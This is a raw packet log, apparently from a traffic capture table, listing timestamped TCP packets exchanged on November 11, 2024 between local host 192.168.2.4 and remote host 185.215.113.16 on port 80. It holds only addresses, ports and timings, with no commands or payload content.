                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842762947 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842768908 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842777967 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842783928 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842791080 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842803001 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842818975 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842844963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842844963 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842859983 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842870951 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842883110 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842892885 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842892885 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842907906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842920065 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842942953 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.842984915 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843374014 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843385935 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843395948 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843408108 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843420029 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843424082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843431950 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843447924 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843461037 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843466997 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843473911 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843485117 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843487978 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843497992 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843522072 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843528986 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843543053 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843544960 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843569994 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843596935 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843729019 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843739986 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843751907 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843763113 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843781948 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843800068 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843897104 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843909979 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843919992 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843925953 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843938112 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843936920 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843975067 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.843992949 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844091892 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844105005 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844115019 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844129086 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844139099 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844142914 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844151020 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844163895 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844163895 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844176054 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844182014 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844189882 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844202995 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844207048 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.844238997 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.850963116 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851017952 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851111889 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851162910 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851274014 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851286888 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851299047 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851310968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851324081 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851327896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851342916 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851361036 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851385117 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851425886 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851444006 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851455927 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851466894 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851483107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851481915 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851494074 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851497889 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851511955 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851522923 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851555109 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851557016 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851598024 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851763964 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851777077 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851787090 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851799965 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851811886 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851819992 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851844072 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851855993 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851895094 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851907969 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851918936 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851933956 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851950884 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.851969957 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852082014 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852108002 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852119923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852132082 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852138996 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852147102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852160931 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852169037 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852193117 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852241993 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852323055 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852336884 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852346897 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852359056 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852370024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852374077 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852406979 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852417946 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852456093 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852468967 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852479935 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852493048 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852504015 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852504969 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852530003 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852567911 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852626085 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852643967 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852653980 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852665901 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852677107 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852682114 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852689981 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852708101 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852721930 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852746010 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852765083 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852818012 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852921009 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852932930 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852943897 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852957010 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852967978 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852969885 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852981091 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852992058 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.852993011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853007078 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853029013 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853055954 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853056908 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853074074 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853085041 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853096008 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853106976 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853110075 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853118896 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853130102 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853146076 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853152990 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853174925 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853224039 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853243113 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853252888 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853266954 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853295088 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853306055 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853668928 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853682041 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853692055 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853704929 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853717089 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853719950 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853729963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853739977 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853764057 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853790045 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853802919 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853816032 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853827000 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853835106 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853844881 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853853941 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853857040 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853869915 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853873014 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853889942 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853909016 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853965998 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.853982925 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854007006 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854037046 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854139090 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854151011 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854161024 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854191065 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854216099 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854279041 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854293108 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854302883 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854316950 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854326010 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854326963 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854346991 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854356050 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854357004 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854372025 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854398012 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854415894 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854429007 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854437113 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854448080 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854459047 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854461908 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854470968 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854494095 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854520082 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854563951 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854577065 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854588032 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854609013 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854626894 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854717016 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854759932 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854857922 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854871988 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854882956 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854893923 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854911089 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854927063 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854986906 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.854999065 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855010033 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855021954 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855029106 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855032921 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855046034 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855057001 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855061054 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855070114 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855091095 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855103970 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855108023 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855123043 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855133057 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855149984 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855156898 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855170965 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855197906 CET4976280192.168.2.4185.215.113.16
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855300903 CET8049762185.215.113.16192.168.2.4
                                                                                                                                                                                                                                                                                        Nov 11, 2024 16:36:22.855318069 CET8049762185.215.113.16192.168.2.4
